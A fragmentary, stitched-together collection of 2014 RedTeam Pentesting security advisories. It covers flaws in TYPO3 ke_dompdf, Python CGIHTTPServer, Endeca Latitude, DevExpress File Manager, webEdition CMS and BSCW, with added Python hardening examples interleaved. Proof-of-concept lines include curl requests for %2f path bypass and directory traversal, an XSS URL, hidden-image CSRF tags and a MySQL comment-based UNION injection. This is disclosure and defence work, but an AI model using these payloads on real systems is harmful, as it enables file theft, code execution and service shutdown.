The TYPO3 extension ke_dompdf contains a version of the dompdf library including all files originally supplied with it. This includes an examples page, which contains different examples for HTML-entities rendered as a PDF. This page also allows users to enter their own HTML code into a text box to be rendered by the webserver using dompdf. dompdf also supports rendering of PHP files and the examples page also accepts PHP code tags, which are then executed and rendered into a PDF on the server. Since those files are not protected in the TYPO3 extension directory, anyone can access this URL and execute arbitrary PHP code on the system. This behaviour was already fixed in the dompdf library, but the TYPO3 extension ke_dompdf supplies an old version of the library that still allows the execution of arbitrary PHP code.
Proof of Concept
================

Access examples.php on the vulnerable system:

http://www.example.com/typo3conf/ext/ke_dompdf/res/dompdf/www/examples.php

Enter PHP code in the text box on the bottom of the page and click the submit button, for example:

The page will return a PDF file containing the output of the PHP code.

Workaround
==========

Remove the directory "www" containing the examples.php file or at least the examples.php file from the extension's directory.

Fix
===

Update to version 0.0.5 of the extension.

Security Risk
=============

high

Timeline
========

2014-04-21 Vulnerability identified
2014-04-30 Customer approved disclosure to vendor
2014-05-06 CVE number requested
2014-05-10 CVE number assigned
2014-05-13 Vendor notified
2014-05-20 Vendor works with TYPO3 security team on a fix
2014-09-02 Vendor released fixed version [2]
2014-12-01 Advisory released

References
==========

The TYPO3 extension ke_dompdf contains an old version of the dompdf library, which contains an example file that can be used to execute arbitrary commands. This vulnerability was fixed in dompdf in 2010. The relevant change can be found in the github repository of dompdf:

[1] https://github.com/dompdf/dompdf/commit/e75929ac6393653a56e84dffc9eac1ce3fb90216

TYPO3-EXT-SA-2014-010: Several vulnerabilities in third party extensions:

[2] http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2014-010/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.
[FD] [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution
;'
        scriptname = dir + '/' + script
        scriptfile = self.translate_path(scriptname)
        if not os.path.exists(scriptfile):
            self.send_error(404, "No such CGI script (%r)" % scriptname)
            return
        if not os.path.isfile(scriptfile):
            self.send_error(403, "CGI script is not a plain file (%r)" % scriptname)
            return
        [...]
[...]

For HTTP GET requests, do_GET() first invokes send_head(). That method calls is_cgi() to determine whether the requested path is to be executed as a CGI script. The is_cgi() method uses _url_collapse_path() to normalize the path, i.e. remove extraneous slashes (/), current directory (.), or parent directory (..) elements, taking care not to permit directory traversal below the document root. The is_cgi() function returns True when the first path element is contained in the cgi_directories list.

As _url_collapse_path() and is_cgi() never URL decode the path, replacing the forward slash after the CGI directory in the URL to a CGI script with the URL encoded variant %2f leads to is_cgi() returning False. This will make CGIHTTPRequestHandler's send_head() then invoke its parent's send_head() method, which translates the URL path to a file system path using the translate_path() method and then outputs the file's contents raw. As translate_path() URL decodes the path, this then succeeds and discloses the CGI script's file contents:

$ curl http://localhost:8000/cgi-bin%2ftest.py
#!/usr/bin/env python2
import json
import sys

db_credentials = "SECRET"

sys.stdout.write("Content-type: text/json\r\n\r\n")
sys.stdout.write(json.dumps({"text": "This is a Test"}))

Similarly, the CGIHTTPRequestHandler can be tricked into executing CGI scripts that would normally not be executable. The class normally only allows executing CGI scripts that are direct children of one of the directories listed in cgi_directories. Furthermore, only direct subdirectories of the document root (the current working directory) can be valid CGI directories. This can be seen in the following example.
Even though the sample server shown above includes "/cgi-bin/subdir" as part of the request handler's cgi_directories, a CGI script named test.py in that directory is not executed:

$ curl http://localhost:8000/cgi-bin/subdir/test.py
[...]
Error code 403.
Message: CGI script is not a plain file ('/cgi-bin/subdir').
[...]

Here, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and returned True. Next, run_cgi() further dissected these paths to perform some sanity checks, thereby mistakenly assuming subdir to be the executable script's filename and test.py to be path info. As subdir is not an executable file, run_cgi() returns an error message. However, if the forward slash between subdir and test.py is replaced with %2f, invoking the script succeeds:

$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py
{"text": "This is a Test"}

This is because neither is_cgi() nor run_cgi() URL decode the path during processing until run_cgi() tries to determine whether the target script is an executable file. More specifically, as subdir%2ftest.py does not contain a forward slash, it is not split into the script name subdir and path info test.py, as in the previous example. Similarly, using URL encoded forward slashes, executables outside of a CGI directory can be executed:

$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py
{"text": "This is a Test"}

Workaround
==========

Subclass CGIHTTPRequestHandler and override the is_cgi() method with a variant that first URL decodes the supplied path, for example:

import urllib
import CGIHTTPServer

class FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):
    def is_cgi(self):
        # decode %2f and friends before the parent class inspects the path
        self.path = urllib.unquote(self.path)
        return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)

Fix
===

Update to the latest Python version from the Mercurial repository at http://hg.python.org/cpython/

Security Risk
=============

The vulnerability can be used to gain access to the contents of CGI binaries or the source code of CGI scripts.
This may reveal sensitive information, for example access credentials. This can greatly help attackers in mounting further attacks and is therefore considered to pose a high risk. Furthermore, attackers may be able to execute code that was not intended to be executed. However, this is limited to files stored in the server's working directory or in its subdirectories.

The CGIHTTPServer code does contain this warning:

"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"

Even when used on a local computer this may allow other local users to execute code in the context of another user.

Timeline
========

2014-04-07 Vulnerability identified
2014-06-11 Customer approved disclosure
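The decode-before-deciding rule the workaround above relies on, as an added example in Python 3 (neither the advisory's code nor CPython's): a classifier that percent-decodes the request path exactly once, normalises it against the document root, and only then compares it with the CGI directory list. The function names, the CGI directory list and the probe paths are constructed for this example. It goes one step beyond the page's Python 2 subclass: a path that lands inside a CGI directory without being a direct child is reported as "deny" rather than silently treated as a static file, so the caller can answer 403 instead of serving the script's source.

```python
"""Added example (not from the advisory): classify a request path the way a
hardened CGIHTTPServer-style handler should, decoding before deciding."""
import posixpath
from urllib.parse import unquote, urlsplit

# constructed for this example; mirrors the default cgi_directories layout
CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]


def collapse_path(path):
    """Percent-decode the URL path once, then normalise it.

    Decoding happens before any slash-based decision, so "%2f" cannot hide a
    path separator from the CGI check. Decoding exactly once keeps the result
    consistent with a translate_path() that also decodes once: a double-encoded
    "%252f" stays a literal "%2f" in the file name and is a separator nowhere.
    """
    decoded = unquote(urlsplit(path).path)
    # A rooted path can never normalise to something above "/", so ".."
    # segments cannot climb out of the document root.
    return posixpath.normpath("/" + decoded.lstrip("/"))


def classify(path, cgi_directories=CGI_DIRECTORIES):
    """Decide how a request path should be handled.

    Returns one of:
      ("cgi", directory, script)  - a direct child of a CGI directory: execute
      ("deny", directory, rest)   - inside a CGI directory but not a direct
                                    child (a subdirectory or the directory
                                    itself): refuse rather than serve raw
      ("static", None, path)      - an ordinary document-root file
    """
    normalised = collapse_path(path)
    for directory in cgi_directories:
        if normalised == directory or normalised.startswith(directory + "/"):
            rest = normalised[len(directory) + 1:]
            if rest and "/" not in rest:
                return ("cgi", directory, rest)
            return ("deny", directory, rest)
    return ("static", None, normalised)


def demo():
    """The advisory's three probes plus two ordinary requests (constructed)."""
    probes = [
        "/cgi-bin%2ftest.py",          # encoded slash before the script
        "/cgi-bin/subdir%2ftest.py",   # encoded slash inside the CGI dir
        "/cgi-bin/..%2ftraversed.py",  # encoded slash after ".."
        "/cgi-bin/test.py?x=1",        # normal CGI call with a query string
        "/index.html",                 # plain static file
    ]
    return {probe: classify(probe) for probe in probes}


if __name__ == "__main__":
    for probe, verdict in demo().items():
        print(f"{probe:32} -> {verdict}")
```

The first probe now classifies as a CGI script (so it is executed, never served as text), the second is refused instead of being executed with a smuggled separator, and the third normalises to a file outside every CGI directory, which is what the page's fixed CPython does as well.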
[FD] [RT-SA-2013-003] Endeca Latitude Cross-Site Scripting
Advisory: Endeca Latitude Cross-Site Scripting

RedTeam Pentesting discovered a Cross-Site Scripting (XSS) vulnerability in Endeca Latitude. By exploiting this vulnerability an attacker is able to execute arbitrary JavaScript code in the context of other Endeca Latitude users.

Details
=======

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-003
Advisory Status: published
CVE: CVE-2014-2400
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2400

Introduction
============

Endeca Latitude is an enterprise data discovery platform for advanced, yet intuitive, exploration and analysis of complex and varied data. Information is loaded from disparate source systems and stored in a faceted data model that dynamically supports changing data. This integrated and enriched data is made available for search, discovery, and analysis via interactive and configurable applications.
(from the vendor's homepage)

More Details
============

Endeca Latitude allows administrators to trigger different functions by using the following two URLs (see [1]):

* http://example.com/config?op=
* http://example.com/admin?op=

When accessing such a URL with an invalid value for the HTTP GET parameter "op", such as http://example.com/config?op=RedTeam%20Pentesting, an error message is shown by the web application and the invalid value is directly embedded into the document without prior escaping, which leads to a Cross-Site Scripting vulnerability.
Proof of Concept
================

As shown by the following URL, an attacker is able to embed arbitrary JavaScript code into the context of the Endeca Latitude instance:

http://example.com/config?op=alert('RedTeam Pentesting');

Workaround
==========

The vendor did not update the vulnerable software, but recommends configuring all installations to require mutual authentication using TLS certificates for both servers and clients, while discouraging users from installing said client certificates in browsers.

Fix
===

Not available. The vendor did not update the vulnerable software to remedy this issue.

Security Risk
=============

The vulnerability can be used to embed arbitrary JavaScript code and therefore offers a wide range of possible attacks such as stealing cookies or displaying a fake login form. Furthermore, an attacker can use this vulnerability to control the Endeca Latitude instance by using the API implemented by its web service (see [2]). The risk of this vulnerability is therefore considered to be high.

Timeline
========

2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future CPU
2014-03-13 Vendor responded with additional information about a potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released

References
==========

[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/src/cadm_url_about_admin_urls.html
[2] http://docs.oracle.com/cd/E29220_01/index.htm

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.
[FD] [RT-SA-2013-002] Endeca Latitude Cross-Site Request Forgery
Advisory: Endeca Latitude Cross-Site Request Forgery

RedTeam Pentesting discovered a Cross-Site Request Forgery (CSRF) vulnerability in Endeca Latitude. Using this vulnerability, an attacker might be able to change several different settings of the Endeca Latitude instance or disable it entirely.

Details
=======

Product: Endeca Latitude
Affected Versions: 2.2.2, potentially others
Fixed Versions: N/A
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: N/A
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2013-002
Advisory Status: published
CVE: CVE-2014-2399
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2399

Introduction
============

Endeca Latitude is an enterprise data discovery platform for advanced, yet intuitive, exploration and analysis of complex and varied data. Information is loaded from disparate source systems and stored in a faceted data model that dynamically supports changing data. This integrated and enriched data is made available for search, discovery, and analysis via interactive and configurable applications.
(from the vendor's homepage)

More Details
============

Endeca Latitude offers administrators the ability to perform different administrative and configuration operations by accessing URLs. These URLs are not secured by a randomly generated token and therefore are prone to Cross-Site Request Forgery attacks. For example, by accessing the URL http://example.com/admin?op=exit an administrator can shut down the Endeca Latitude instance. Several other URLs exist (as documented at [1] and [2]) which can be used to trigger operations such as flushing caches or changing the logging settings.

Proof of Concept
================

An attacker might prepare a website which can trigger arbitrary functionality (see [1] and [2]) of an Endeca Latitude instance if someone opens the attacker's website in a browser that can reach Endeca Latitude.
An easy way to implement this is to embed a hidden image into an arbitrary website which uses the corresponding URL as its source:

<img src="http://example.com/admin?op=exit" style="display:hidden" />
<img src="http://example.com/config?op=log-disable" style="display:hidden" />
[...]

Workaround
==========

The vendor did not update the vulnerable software, but recommends configuring all installations to require mutual authentication using TLS certificates for both servers and clients, while discouraging users from installing said client certificates in browsers.

Fix
===

Not available. The vendor did not update the vulnerable software to remedy this issue.

Security Risk
=============

The vulnerability enables attackers to interact with an Endeca Latitude instance in different ways. Possible attacks include the changing of settings as well as denying service by shutting down a running instance. Attackers mainly benefit from this vulnerability if the instance is not already available to them, but for example only to restricted IP addresses or after authentication. Since this makes it harder to identify potential target systems and the attack mainly allows disturbing the service until it is restarted, the risk of this vulnerability is considered to be low.
Timeline
========

2013-10-06 Vulnerability identified
2013-10-08 Customer approved disclosure to vendor
2013-10-15 Vendor notified
2013-10-17 Vendor responded that investigation/fixing is in progress
2014-02-24 Vendor responded that bug is fixed and scheduled for a future CPU
2014-03-13 Vendor responded with additional information about a potential workaround
2014-04-15 Vendor releases Critical Patch Update Advisory with little information on the proposed fix
2014-04-16 More information requested from vendor
2014-05-02 Vendor responds with updated information
2014-06-25 Advisory released

References
==========

[1] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20administrative%20operations
[2] http://docs.oracle.com/cd/E29220_01/mdex.222/admin/toc.htm#List%20of%20supported%20logging%20variables

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                      Tel.: +49 241 510081-0
Dennewartstr. 25-27                          Fax : +49 241 510081-99
52068 Aachen                                 https://www.redteam-pentesting.de
Germany
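The two controls whose absence the advisory describes, as an added Python example (not Endeca Latitude's code): a state-changing administrative operation is only honoured over POST and only when the request carries a secret bound to the administrator's session, which a page on another origin cannot read. The session store, the function names and every operation name other than "exit" and "log-disable" are constructed for this example.

```python
"""Added example (not the vendor's code): per-session CSRF tokens and a
POST-only rule for the kind of admin operations the advisory describes."""
import hmac
import secrets

# constructed: the operations the endpoint is willing to run; "exit" and
# "log-disable" are the two named in the advisory, the others are made up
ALLOWED_OPS = {"exit", "log-disable", "log-enable", "flush-cache"}


def issue_token(session):
    """Mint a fresh random token and bind it to this session.

    The token is rendered into the admin page's own form; a page on another
    origin cannot read it, which is what gives the later check its meaning.
    """
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def check_admin_op(session, method, op, presented_token):
    """Return (allowed, reason) for an attempted administrative operation.

    session          server-side session of the authenticated administrator
    method           HTTP method of the request
    op               value of the "op" parameter
    presented_token  token from the request body or a custom header; never a
                     cookie, since cookies ride along with a forged request
    """
    # 1. Anything reachable via GET can be triggered by <img src=...>, <link>
    #    or a redirect, so state changes are refused regardless of any token.
    if method != "POST":
        return (False, "state-changing operations must not be reachable via GET")
    if op not in ALLOWED_OPS:
        return (False, "unknown operation")
    # 2. The request must prove knowledge of the session-bound secret.
    expected = session.get("csrf_token")
    if not expected or not presented_token:
        return (False, "missing CSRF token")
    # Constant-time comparison on bytes: no early exit, no str encoding issues.
    if not hmac.compare_digest(expected.encode(), presented_token.encode()):
        return (False, "CSRF token mismatch")
    return (True, "ok")


def demo():
    """Replay the advisory's hidden-image request next to a legitimate one."""
    session = {}
    token = issue_token(session)
    return {
        # what <img src="http://example.com/admin?op=exit"> produces
        "forged_get": check_admin_op(session, "GET", "exit", None),
        # a forged form POST: the attacker's page cannot know the token
        "forged_post": check_admin_op(session, "POST", "exit", "guess"),
        # the administrator's own form, token included
        "legitimate": check_admin_op(session, "POST", "log-disable", token),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:12} -> {verdict}")
```

The order of the checks matters: the method check comes first so that a token accidentally leaked into a URL (referer logs, browser history) still cannot be replayed through a GET.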
[FD] [RT-SA-2014-006] Directory Traversal in DevExpress ASP.NET File Manager
Advisory: Directory Traversal in DevExpress ASP.NET File Manager

During a penetration test RedTeam Pentesting discovered a directory traversal vulnerability in DevExpress' ASP.NET File Manager and File Upload. Attackers are able to read arbitrary files by specifying a relative path.

Details
=======

Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL: https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575

Introduction
============

"The DevExpress ASP.NET Subscription includes a standalone Multi-File Upload Manager for WebForms and MVC and a pre-built File Manager for WebForms; built so you can instantly introduce file management capabilities in your next web application."
(from DevExpress' Homepage)

More Details
============

The ASPX File Manager component is prone to a directory traversal vulnerability. Attackers with access to the File Manager component can read arbitrary files on the same partition as the shared directory. A common request to download a file via the File Manager component requires multiple HTTP POST parameters:

__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7C
__EVENTVALID=

The parameter __EVENTARGUMENT=13| specifies a file download and the file which is to be downloaded. Attackers may also request files outside of the shared directory by prepending a relative path to a parent directory.

Proof of Concept
================

By requesting files with a relative path, files otherwise not available will be accessible through the File Manager component.
Depending on the shared directory and the webserver configuration, the webserver configuration file might for example be accessible through the File Manager component:

__EVENTARGUMENT=13|../../web.config

Other sensitive operating system files could be affected, too. Example exploit:

curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
"&__EVENTARGUMENT=13%7C../../web.config&=&__EVENTVALID" \
http://example.com/FileManagerComponent.aspx

The request above will download the specified file.

Workaround
==========

Instead of a physical file system provider, a database file system provider with limited access permissions could be used.

Fix
===

Update ASPxFileManager control to DevExpress libraries version v13.2.9.

Security Risk
=============

The risk is estimated to be high. This vulnerability allows attackers to access arbitrary files on the same partition as the File Manager's root directory. This may allow attackers to read sensitive information like the webserver configuration.

Timeline
========

2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released

References
==========

Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security related areas. The results are made available as public security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Dennewartstr. 25-27                         Fax : +49 241 510081-99
52068 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

signature.asc
Description: Digital signature

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
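The defensive counterpart to the traversal described in the advisory above is a containment check on the download path. This is an added example, not code from the advisory or from DevExpress: it parses the "13|<path>" form of __EVENTARGUMENT, shows the naive join beside a check that refuses anything resolving outside the shared directory, and assumes a constructed root directory.

```python
import os
import re
from urllib.parse import unquote

# Constructed example root for the File Manager's shared directory (the real
# path of any deployment is not known from the advisory).
FILE_MANAGER_ROOT = "/var/www/app/uploads"

_WINDOWS_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def parse_event_argument(event_argument):
    """Split the ASPxFileManager __EVENTARGUMENT value "13|<path>" into
    (command, path). The URL-encoded form "13%7C..." is decoded first; "13"
    is the download command named in the advisory."""
    command, sep, path = unquote(event_argument).partition("|")
    if not sep:
        raise ValueError("malformed __EVENTARGUMENT: missing '|' separator")
    return command, path


def resolve_within_root(root, relative_path):
    """Return the absolute path for relative_path if it stays inside root,
    otherwise None. Absolute paths, drive letters and NUL bytes are refused,
    separators are unified, and the check runs on the fully normalised path
    so that '..' segments cannot escape the root."""
    path = relative_path.replace("\\", "/")
    if path.startswith("/") or _WINDOWS_DRIVE_RE.match(path) or "\0" in path:
        return None
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, path))
    if candidate == root_abs or candidate.startswith(root_abs + os.sep):
        return candidate
    return None


def file_for_download(event_argument, root=FILE_MANAGER_ROOT):
    """Vulnerable and hardened resolution side by side: returns
    (naive_path, checked_path). naive_path is a plain join, which honours a
    relative prefix the way the advisory describes; checked_path is None
    when the request would leave the shared directory."""
    command, path = parse_event_argument(event_argument)
    if command != "13":
        raise ValueError("not a download command")
    naive_path = os.path.normpath(os.path.join(root, path))
    return naive_path, resolve_within_root(root, path)
```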
[FD] [RT-SA-2014-005] SQL Injection in webEdition CMS File Browser Installer Script
Advisory: SQL Injection in webEdition CMS File Browser

RedTeam Pentesting discovered an SQL injection vulnerability in the file browser component of webEdition CMS during a penetration test. Unauthenticated attackers can get read-only access on the SQL database used by webEdition and read for example password hashes used by administrative accounts.

Details
=======

Product: webEdition CMS
Affected Versions: webEdition 6.3.8.0 svn6985 down to 6.3.3.0, probably earlier versions, too
Fixed Versions: 6.2.7-s1 - 6.3.8-s1
Vulnerability Type: SQL Injection
Security Risk: high
Vendor URL: http://www.webedition.org
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-005
Advisory Status: published
CVE: CVE-2014-2303
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2303

Introduction
============

"webEdition is a flexible CMS for companies of every size. It offers a great amount of functionality and can be flexibly customized for individual needs. It is ideally suited for users who want to operate their web-site comfortably. Even the creation of custom web-applications is easily possible with webEdition."
(translated from webEdition homepage)

More Details
============

The webEdition CMS contains a file browser component that allows browsing parts of the website's filesystem structure. It is usually reachable under the following URL:

http://www.example.com/webEdition/we_fs.php

When browsing to individual directories, HTTP GET requests such as the following are sent to the web server:

GET /webEdition/we_fs.php?what=4&table=tblFile&id=1&order=IsFolder%20DESC,%20Text&filter= HTTP/1.1
Host: www.example.com
[...]
The server responds with JavaScript code that updates the directory listing:

top.clearEntries();
top.addEntry(13,"folder.gif","careers",1,"/en/careers");
top.addEntry(14,"folder.gif","company",1,"/en/company");
top.addEntry(15,"folder.gif","contact",1,"/en/contact");
top.addEntry(20,"we_dokument.gif","index.php",0,"/en/index.php");
top.writeBody(top.fsbody.document);
[...]

The requests which are sent to retrieve this information contain two interesting parameters: "table" with a value of "tblFile" which appears to name a database table, and the parameter "order" with a value of "IsFolder DESC, Text", which contains parts of an SQL ORDER BY clause. In combination, these two parameters can be used to perform SQL injection attacks. It appears that they are embedded into an SQL query in a similar manner as follows:

SELECT ID,ParentID,Text,Path,IsFolder,Icon FROM tblFile WHERE [...] ORDER BY IsFolder DESC, Text

Using a "table" parameter value of "tblFile WHERE 1=1 /*" and an "order" parameter value of "*/" will result in a query similar to the following:

SELECT ID,ParentID,Text,Path,IsFolder,Icon FROM tblFile WHERE 1=1 /* WHERE [...] ORDER BY */

The queries executed by the CMS retrieve six columns, which can be seen in the application's source code, or by injecting ORDER BY clauses with numeric column indexes into the query. Knowing the number of columns in a query, it is typically possible to use the UNION operator to obtain additional information, for example from other tables. As a security measure, webEdition implements filtering of the UNION keyword. The web application checks whether the text "UNION" is part of user-supplied information that is entered into database queries and then blocks such queries.
This behaviour is implemented in the file

/webEdition/we/include/we_classes/database/we_database_base.class.php

using the function

preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings)

The CMS first checks whether the text "UNION" appears in the query string in any combination of upper- and lowercase characters. If that is the case, a regular expression is used to determine whether the word "UNION" appears in any context that is deemed dangerous by the application developers.

However, the underlying MySQL database system supports embedding MySQL-specific query code within comments that contain an exclamation mark ("!") (see https://dev.mysql.com/doc/refman/5.5/en/comments.html). For example, a query like

SELECT * FROM tblUsers WHERE 1=0 /*! OR 1=1 */

will yield no results on other database systems, but will return all rows on MySQL. Likewise, the text "/*!UNION*/", which is not caught by the aforementioned regular expression, can be used instead of just "UNION" on MySQL, thus enabling injections that use the UNION operator:

$ curl --silent 'http://www.example.com/webEdition/we_fs.php?what=4'\
'&table=tblFile+WHERE+1=0+/*!UNION*/+SELECT+1,2,3,4,5,6/*&order=*/'
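To make the gap in the keyword filter concrete, here is an added example (not code from the advisory or from webEdition): a Python port of the quoted preg_match check, a variant that also refuses MySQL versioned comments, and the allowlist validation of the "table" and "order" parameters that removes the need for keyword blacklisting altogether. The table allowlist and the WHERE placeholder are assumptions; the six column names are the ones quoted on the page.

```python
import re

# Python port of the PHP check quoted in the advisory (the PHP code first
# tests for "union" case-insensitively, then applies this regular expression):
#   preg_match('/[\s\(`"\'\\/)]union[\s\(`\/]/i', $queryWithoutStrings)
VENDOR_UNION_RE = re.compile(r'''[\s(`"'/)]union[\s(`/]''', re.IGNORECASE)

# Constructed allowlists: the six columns are the ones named on the page,
# the table set is an assumption about the CMS schema.
ORDER_COLUMNS = {"ID", "ParentID", "Text", "Path", "IsFolder", "Icon"}
KNOWN_TABLES = {"tblFile"}


def vendor_filter_blocks(fragment):
    """Behaviour of the affected check: a UNION is rejected only when it is
    bounded by whitespace, quotes, backticks, parentheses or a slash, so the
    "!" of a MySQL versioned comment slips past it."""
    if "union" not in fragment.lower():
        return False
    return VENDOR_UNION_RE.search(fragment) is not None


def hardened_filter_blocks(fragment):
    """Keyword check that closes the gap shown on the page: MySQL executes
    the body of "/*! ... */" comments, so any such opener in user-supplied
    SQL fragments is refused before the keyword test runs."""
    return "/*!" in fragment or vendor_filter_blocks(fragment)


def validate_table(table):
    """Allowlist instead of blacklist: the table name must be a known one."""
    return table in KNOWN_TABLES


def validate_order(order):
    """Accept only a comma-separated list of '<column> [ASC|DESC]' items built
    from known columns; "IsFolder DESC, Text" passes, "*/" does not."""
    for item in order.split(","):
        parts = item.strip().split()
        if not 1 <= len(parts) <= 2 or parts[0] not in ORDER_COLUMNS:
            return False
        if len(parts) == 2 and parts[1].upper() not in ("ASC", "DESC"):
            return False
    return True


def build_listing_query(table, order):
    """Assemble the query shape quoted in the advisory from validated parts
    only; the WHERE condition is a placeholder with a bound parameter
    (assumption, the real condition is elided on the page)."""
    if not validate_table(table) or not validate_order(order):
        raise ValueError("rejected table or order parameter")
    return ("SELECT ID,ParentID,Text,Path,IsFolder,Icon FROM " + table +
            " WHERE ParentID = %s ORDER BY " + order)
```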
[FD] [RT-SA-2014-004] Remote Command Execution in webEdition CMS Installer Script
r releases between 6.2.7 and 6.3.8. The newest, updated version would therefore be 6.3.8-s1.

Note that the version check of webEdition might tell you that there is no update available and that you are running Version "6.3.8 (6.3.8.0 Release, SVN-Revision 6985)". It will still tell you that the newest available version is "6.3.8-s1 (6.3.8.0 Release, SVN-Revision 6985)", so you can use the "Update-Repetition" function to get the fix for this vulnerability.

Also note that the update does not remove the OnlineInstaller, but modifies the login dialogue to remove the OnlineInstaller instead. You will need to open the login dialogue after installing the update to actually delete the OnlineInstaller. To be on the safe side, check the OnlineInstaller directory manually for any files that still need to be removed.

Security Risk
=============

Attackers can not only use the OnlineInstaller to destructively reinstall webEdition, but can also run arbitrary PHP code by setting their own proxy server in the OnlineInstaller and inject content that is used as a parameter for the PHP eval() function. Since this attacker-supplied code is executed on the webEdition server with the privileges of the web server, this is a high risk, especially because the attack is not as easy to detect as a reinstallation of webEdition by an attacker.
Timeline
========

2014-02-20 Vulnerability identified
2014-03-04 Customer approved disclosure to vendor
2014-03-06 CVE number requested and assigned
2014-03-07 Vendor notified
2014-03-10 Vendor acknowledges vulnerability
2014-05-20 Vendor announces fixed versions
2014-05-28 Advisory released

References
==========

http://www.webedition.org/de/aktuelles/webedition-cms/Wichtiges-Sicherheitsupdate-fuer-CMS-webEdition-veroeffentlicht (German)
http://www.webedition.org/de/aktuelles/webedition-cms/Wichtige-Hinweise-zum-Sicherheitsupdate (German)
[FD] [RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW
Advisory: Metadata Information Disclosure in OrbiTeam BSCW

RedTeam Pentesting discovered an information disclosure vulnerability in OrbiTeam's BSCW collaboration software. An unauthenticated attacker can disclose metadata about internal objects which are stored in BSCW.

Details
=======

Product: BSCW
Affected Versions: BSCW <=5.0.7
Fixed Versions: BSCW >=5.0.8
Vulnerability Type: Information Disclosure
Security Risk: medium
Vendor URL: http://www.bscw.de/english/product.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003
Advisory Status: published
CVE: CVE-2014-2301
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301

Introduction
============

"The BSCW shared workspace system is the tool of choice for efficient group collaboration. BSCW permits the creation of documents, appointments, contacts, tasks and notes within shared workspaces. Without having to install additional software, team members can access this data around-the-clock, from anywhere in the world. Mission-critical information is constantly available to all authorised personnel regardless of location, ensuring that complex workflows can be coordinated with minimal effort."
